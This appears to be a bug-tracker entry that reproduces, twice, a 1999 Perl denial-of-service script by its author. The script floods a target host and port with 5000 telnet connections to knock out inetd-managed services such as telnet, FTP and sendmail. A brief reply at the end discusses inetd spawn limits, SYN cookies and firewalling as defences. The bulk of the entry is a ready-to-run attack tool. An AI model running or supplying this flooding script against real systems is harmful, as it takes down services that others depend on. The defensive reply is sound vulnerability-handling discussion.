#!/usr/bin/perl # Author: Jesus A. Juarez # Jul 1999 # e-mail: chuby # The Xploit attack to services under inetd daemon on the # Linux Box's, this cause the suspend of the services. # The problem is on the inetd, telnet, ftp & sendmail, etc; # daemon's, because this programs do not limit the number of # calls by client. This causes that the service requested # became down. # Use it under your own risk. # The TCP-WRAPPERS don't Fix this problem. # Sintax: # DoS-TFS.pl <hostname> <port> <enter> # DoS-Telnet, FTP, Sendmail, etc. # This code has beed tested from Linux to Linux Box's whith # Perl installed, I think' that it run the same way on # some Unix's or Windows System to damage some Linux Box's. use Net::Telnet; for ($i=0;$i<5000;$i++) { $obj=Net::Telnet->new( Host => "$ARGV[0]",Port > "$ARGV[1]"); my $cmd = "."; $obj->print("$cmd"); $obj->close; } #this problem will not be published. # please notify me, when fix it. :)
*** Bug 4004 has been marked as a duplicate of this bug. *** #!/usr/bin/perl # Author: Jesus A. Juarez # Jul 1999 # e-mail: chuby # The Xploit attack to services under inetd daemon on the # Linux Box's, this cause the suspend of the services. # The problem is on the inetd, telnet, ftp & sendmail, etc; # daemon's, because this programs do not limit the number of # calls by client. This causes that the service requested # became down. # Use it under your own risk. # The TCP-WRAPPERS don't Fix this problem. # Sintax: # DoS-TFS.pl <hostname> <port> <enter> # DoS-Telnet, FTP, Sendmail, etc. # This code has beed tested from Linux to Linux Box's whith # Perl installed, I think' that it run the same way on # some Unix's or Windows System to damage some Linux Box's. use Net::Telnet; for ($i=0;$i<5000;$i++) { $obj=Net::Telnet->new( Host => "$ARGV[0]",Port > "$ARGV[1]"); my $cmd = "."; $obj->print("$cmd"); $obj->close; } #this problem will not be published. # please notify me, when fix it. :)
inetd will shut down the services that are being over-used or come under heavy network activity. One can use the wait/nowait.N to limit the number of spawns for that service to N per second, but that is not a effective protection against these types of attacks. The kernel SYn cookies will also help here, but the only effective way of protection is firewalling off the attacker.